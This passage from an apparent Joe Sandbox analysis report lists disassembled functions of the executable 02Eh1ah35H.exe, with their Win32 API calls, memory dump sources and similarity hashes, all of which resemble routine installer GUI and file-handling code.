                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404686
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404705
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404721
                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                • String ID: Call$N$zD@
                                                                                                                                                                                • API String ID: 3103080414-4182535457
                                                                                                                                                                                • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                                                                                                                                • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                                                                                                                                                                • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                                                                                                                                                                Function 0040603A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                                                                                                                                                  • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                                                                                                                  • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                                                                                                                                                                • wsprintfA.USER32 ref: 004060B9
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                                                                                                                                                  • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                  • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                                                                                                                                                • API String ID: 2171350718-2304911260
                                                                                                                                                                                • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                                                                                                                                • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                                                                                                                                • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                • String ID: F
                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                                                                                                                                • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                                                                                                                                • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                                                                                                                                                Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                • CharPrevW.USER32(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                                                                                                                                Strings
                                                                                                                                                                                • *?|<>/":, xrefs: 004066EF
                                                                                                                                                                                • "C:\Users\user\Desktop\02Eh1ah35H.exe", xrefs: 0040669D
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 589700163-2108849867
                                                                                                                                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                                                                                                                                                                Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00404406
                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404412
                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 0040441E
                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404431
                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404441
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040445B
                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404465
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                                                                                                                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                                                                                                                                                                Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                                                                                                  • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                                                                                                                                • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                                                                                                                                                Function 00404CFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404D22
                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D3C
                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                • String ID: f
                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
